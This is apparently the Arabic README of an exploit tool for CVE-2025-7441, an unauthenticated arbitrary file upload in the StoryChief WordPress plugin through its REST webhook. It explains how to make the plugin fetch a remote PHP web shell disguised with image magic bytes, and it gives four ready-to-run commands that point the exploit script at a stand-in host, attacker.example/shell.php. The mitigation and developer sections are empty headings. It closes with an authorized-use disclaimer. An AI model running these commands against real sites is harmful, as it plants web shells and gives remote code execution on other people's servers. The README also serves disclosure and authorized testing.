
StoryChief <= 1.0.42 - رفع ملفات عشوائي بدون مصادقة
StoryChief <= 1.0.42 - رفع ملفات تعسفي بدون مصادقة
إصدارات StoryChief (إضافة ووردبريس) حتى 1.0.42 ضمنًا تتضمن ثغرة حرجة لرفع ملفات تعسفي بدون مصادقة عبر نقطة نهاية REST /wp-json/storychief/webhook. يمكن للمهاجم دفع الإضافة إلى جلب مورد بعيد يتحكم به المهاجم (مثل قشرة ويب) وحفظه في دليل uploads الخاص بالموقع، مما يتيح تنفيذ أكواد عن بُعد في العديد من نشرات ووردبريس الافتراضية.
تقبل الإضافة حمولة JSON واردة (حدث نشر) تحتوي على حقل featured_image -> data -> sizes -> full يشير إلى عنوان URL تعسفي. لا يقوم StoryChief بتحقق كافٍ من نوع/محتوى الملف ولا يقيّد مصدر العنوان، مما يسمح للإضافة بجلب المورد البعيد وحفظه في دليل uploads الخاص بالموقع. لا يوجد تحقق كافٍ لمنع تخزين ملفات تحتوي على أكواد قابلة للتنفيذ.
يشرح هذا القسم سكربت الاستغلال (المقدَّم بشكل منفصل) على مستوى عالٍ ويربط كل سلوك مهم بالثغرة الكامنة.
عند استخدام ملف PHP بعيد (مثال: https://attacker.example/shell.php) يجب أن يتضمّن الملف ترويسة صورة صالحة (بايتات سحرية) حتى تتعامل معه الإضافة أو كود معالجة الصور وتقبله كصورة. نقاط أساسية:
استبدل العناصر النائبة بأهداف مصرح بها. تستخدم جميع الأمثلة أدناه عنوان URL لقشرة PHP بعيدة.
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php
python3 CVE-2025-7441.py -u https://target.example/wp-json/storychief/webhook -shell https://attacker.example/shell.php --debug
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --use-curl
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --print-only
علامات مهمة:
على المدى القصير:
إرشادات للمطورين:
هذه الوثيقة مخصصة للمدافعين والمختبِرين المصرح لهم. لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني وغير أخلاقي.
إذا كنت تبلغ الجهة المصنعة أو مالك الموقع بالمشكلة، فاذكر تفاصيل إعادة الإنتاج وخطوات المعالجة الآمنة والإصلاحات المقترحة.